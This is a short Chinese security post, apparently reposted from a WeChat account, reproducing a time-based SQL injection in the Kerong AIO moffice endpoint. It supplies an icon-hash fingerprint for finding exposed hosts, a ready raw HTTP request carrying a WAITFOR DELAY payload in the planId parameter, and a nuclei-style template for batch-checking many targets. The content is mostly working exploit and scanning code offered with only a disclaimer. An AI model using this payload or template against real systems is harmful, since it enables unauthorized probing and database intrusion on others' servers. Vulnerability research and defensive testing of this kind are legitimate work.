资产收集
icon_hash="-638292089"
漏洞复现
发送请求
GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:15'--&sid=1 HTTP/1.1Host:User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36Connection: close
返回包,十五秒延时
批量验证脚本
id: ZH-2024-07-08-001
info:
name: 科荣AIO moffice SQL注入漏洞
author: god
severity: low
http:
- raw:
- |+
@timeout: 30s
GET /moffice?op=showWorkPlan&planId=1';WAITFOR+DELAY+'0:0:15'--&sid=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- 'duration>=15'
原文始发于微信公众号(Devil安全):【漏洞复现】科荣AIO moffice 存在SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论